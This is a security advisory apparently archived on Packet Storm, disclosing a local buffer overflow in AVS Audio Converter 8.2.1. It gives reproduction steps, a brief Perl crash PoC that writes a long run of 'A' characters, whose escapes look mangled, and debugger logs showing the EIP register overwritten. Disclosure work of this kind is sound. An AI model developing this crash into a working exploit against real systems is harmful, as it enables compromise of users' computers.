exploit the possibilities

AVS Audio Converter 8.2.1 Buffer Overflow

AVS Audio Converter 8.2.1 Buffer Overflow
Posted Aug 22, 2016
Authored by ZwX | Site vulnerability-lab.com

AVS Audio Converter version 8.2.1 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
MD5 | db77be27b5fb866f8a6eb48802fbb144

AVS Audio Converter 8.2.1 Buffer Overflow

Change Mirror Download
Document Title:
AVS Audio Converter 8.2.1 - Buffer Overflow Vulnerability

References (Source):

Release Date:

Vulnerability Laboratory ID (VL-ID):

Common Vulnerability Scoring System:

Product & Service Introduction:
AVS Audio Editor is an audio file editor of its primary function is for editing audio files. It is able to
cut, join, combine or split audio files. All these operations are done with great precision to the hundredth
of a second. You can work with files in .wav formats, Mp3, Pcm, M4A, Flac and many others.

(Copy of the Vendor Homepage: http://www.avs4you.com/AVS-Audio-Converter.aspx )

Abstract Advisory Information:
An independent vulnerability laboratory researcher discovered a local buffer overflow vulnerability in the AVS Audio Converter 8.2.1 software.

Vulnerability Disclosure Timeline:
2016-08-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Affected Product(s):
Product: AVS Audio Converter - Software 8.2.1

Exploitation Technique:

Severity Level:

Technical Details & Description:
A buffer overflow vulnerability has been discovered in the official software AVS Audio Converter V8.2.1.
The vulnerability allows local attackers to overwrite registers to compromise the local software process.

Vulnerability classic buffer overflow is in the AVS Audio Converter. An attacker can manipulate the
bit EIP register to execute the next instruction of their choice. Attackers can eg
execute arbitrary code with the privileges of the process. The attacker has a large unicode string to crush
the EIP register process. Finally, the attacker is able to process the takeover by a crushing of the
active program process to compromise the computer system.

Proof of Concept (PoC):
The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Download and install the AVS Audio Converter.exe
2. Run the code via perl script or perl
3. A file format (poc.txt) will be created
4. Open the generated file (poc.txt)
5. Start the AVS Audio Converter software
6. Attach a debugger like windbg, immunity or ollydbg
7. Load the path location by software interaction or copy paste the file characters AAAAAAAAA+... as input to the Output Folder
8. Click to Browse function for the path
9. Software will crash with unhandled exception and critical access violation
10. Watch the debugger logs were the eip is overwritten
11. Interact to manipulate the followup address
12. Successful reproduce of the local buffer overflow vulnerability!

PoC: Exploitation (Perl)
my $Buff = "x41" x 9000;
print MYFILE $Buff;
print "Local BOF PoC by ZwXn";

--- Debug Session Logs [WinDBG] ---
Access violation - code c0000005
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=77db38a0 esi=00000000 edi=00000000
eip=41414141 esp=0014f578 ebp=0014f598 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
41414141 ?? ???

0:000> d 0014fab4
0014fab4 41414141
0014fab8 41414141
0014fabc 41414141
0014fac0 41414141
0014fac4 41414141
0014fac8 41414141
0014facc 41414141
0014fad0 41414141
0014fad4 41414141
0014fad8 41414141
0014fadc 41414141
0014fae0 41414141
0014fae4 41414141
0014fae8 41414141
0014faec 41414141
0014faf0 41414141
0014faf4 41414141
0014faf8 41414141
0014fafc 41414141
0014fb00 41414141
0014fb04 41414141
0014fb08 41414141
0014fb0c 41414141
0014fb10 41414141
0014fb14 41414141
0014fb18 41414141
0014fb1c 41414141
0014fb20 41414141
0014fb24 41414141
0014fb28 41414141
0014fb2c 41414141
0014fb30 41414141

Note: The access violation with the exception and followup offsets shows that the ecx & eip was overwritten.

Security Risk:
The security risk of the local buffer overflow vulnerability in the avs software is estimated as high. (CVSS 6.3)

Credits & Authors:
ZwX - [http://www.vulnerability-lab.com/show.php?user=ZwX]

Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

Copyright A(c) 2016 | Vulnerability Laboratory - [Evolution Security GmbH]aC/

SERVICE: www.vulnerability-lab.com


RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    8 Files
  • 2
    Jan 2nd
    11 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    2 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    18 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    10 Files
  • 10
    Jan 10th
    13 Files
  • 11
    Jan 11th
    2 Files
  • 12
    Jan 12th
    4 Files
  • 13
    Jan 13th
    21 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    12 Files
  • 16
    Jan 16th
    18 Files
  • 17
    Jan 17th
    11 Files
  • 18
    Jan 18th
    3 Files
  • 19
    Jan 19th
    2 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    21 Files
  • 22
    Jan 22nd
    19 Files
  • 23
    Jan 23rd
    19 Files
  • 24
    Jan 24th
    8 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2016 Packet Storm. All rights reserved.

Security Services
Hosting By